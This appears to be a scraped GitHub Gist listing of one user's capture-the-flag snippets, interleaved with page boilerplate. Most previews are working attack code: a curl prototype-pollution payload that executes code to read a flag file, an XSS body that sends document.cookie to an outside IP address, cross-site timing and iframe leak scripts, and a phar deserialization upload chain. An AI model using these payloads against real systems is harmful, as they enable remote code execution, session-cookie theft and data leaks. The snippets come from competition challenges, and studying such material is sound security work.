If you can render /debug/answer in server-side, you can get the first flag.
Nginx denies accesses to /debug.
location /debug {
# IP address restriction.
# TODO: add allowed IP addresses here
tyage tyage
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import javascript | |
| import DataFlow::PathGraph | |
| // TODO: need to add constraint of "@nguniversal/express-engine" | |
| class Configuration extends TaintTracking::Configuration { | |
| Configuration() { this = "Angular SSRF" } | |
| // string not start with https?:// or // | |
| override predicate isSource(DataFlow::Node source) { | |
| source.getStringValue().regexpMatch("^(?!(https?:|//)).*$") |
tyage
/ angular-of-universe.md
Last active
September 23, 2020 08:28
tyage
/ exploit.sh
Last active
August 11, 2020 12:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl http://10.13.37.$i:14017/config/validated/json-schema/validate -H 'content-type: application/json' --data '{"$schema":{"type":"object","properties":{"__proto__":{"type":"object","properties":{"outputFunctionName":{"type":"string","default":"x;var buf = Buffer.alloc(128);var fs = process.mainModule.require(`fs`);var fd=fs.openSync(`/fl`+`ag`);fs.readSync(fd, buf, 0, 128);fs.closeSync(fd);return buf.toString();//x"},"path":{"type":"string","default":"/foo"}}}}}}' |
tyage
/ gist:6cedcff95fa3afcb06963dffef57c542
Created
July 12, 2020 08:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| setTimeout(() => { | |
| (new Image()).src='/start'; | |
| var start = performance.now(); | |
| fetch("https://www.materialui.co/materialIcons/navigation/close_black_72x72.png", { | |
| mode: "no-cors", | |
| credentials: "include" | |
| }).then((response) => { | |
| var end = performance.now(); |
tyage
/ hugo-export-with-wp-syntax.diff
Last active
May 4, 2020 15:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1a2 | |
| > | |
| 222,223d222 | |
| < do_action('wp_print_scripts'); | |
| < | |
| 225,228d223 | |
| < | |
| < # remove theCode | |
| < $content = preg_replace('/<p class="theCode[^<]+<\/p>/', '', $content); | |
| < |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/local/bin/zsh | |
| command=( | |
| #cookie "PHPSESSID" "rsha06bn3700l9jtvpvsottf7q" | |
| #header "Content*" "compressed" | |
| header "HTTP/ 999 " "found" | |
| #header "HTTP/0.9 " "OK" | |
| #header "Connection" "close" | |
| body "<script\r\n>location.href='//35.209.128.35:12345/?'+document.cookie\r\n</script" b | |
| hello 1 1 |
tyage
/ bruteforce.py
Last active
April 1, 2020 03:31
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import random | |
| import sys | |
| FLAG_LENGTH = 42 | |
| OPS_CURSOR = 0 | |
| RESULT_CURSOR = 0 | |
| TIME = 157763354 |
tyage
/ openctf.md
Created
August 10, 2019 17:46
/*'/*"+/.*/+target.exploit//
tyage
/ secret-note-keeper.php
Created
June 1, 2019 13:49
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $prefix = ""; | |
| if ($_GET["prefix"]) { $prefix = $_GET["prefix"]; } | |
| for ($i = 20; $i <= 126; $i++) { | |
| echo "<iframe id='" . chr($i) . "' src='http://challenges.fbctf.com:8082/search?query=fb%7b" . urlencode($prefix . chr($i)) ."'></iframe>"; | |
| } | |
| ?> | |
| <script> | |
| Array.from(document.querySelectorAll('iframe')).forEach(f => { |
tyage
/ avater-uploader-2
Created
May 18, 2019 23:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| IMAGE=$(curl http://153.127.202.154:1002/upload.php -F "file=@test4.phar.png" -vvv 2>&1 | grep Set-Cookie | sed -r 's/^.*session=([^.]+).*$/\1/' | base64 -d 2>/dev/null | sed -r 's/^.*avatar":"([^"]+).*$/\1/') | |
| echo $IMAGE | |
| wget http://153.127.202.154:1002/uploads/$IMAGE | |
| node -e "function btoa(str) { var buffer; if (Buffer.isBuffer(str)) { buffer = str; } else { buffer = new Buffer(str.toString(), 'binary'); } return buffer.toString('base64');};console.log('session=' + btoa('{\"name\":\"AAAAAAAAAAAAAAAA\",\"flash\":{\"type\":\"error\",\"message\":\"Uploaded file is not PNG format.\"},\"theme\":\"phar://./uploads/$IMAGE/exploit\"}').replace(/=/g,'') + '.JDJ5JDEwJC5LS1h0UnlUbC5OeHhWVHdFRXovZ095N2taU3NPTXBhTDRnMi4yNXkwMnQ3eHp1dW16SzVt')" > cookie | |
| COOKIE=$(cat cookie) | |
| echo $COOKIE |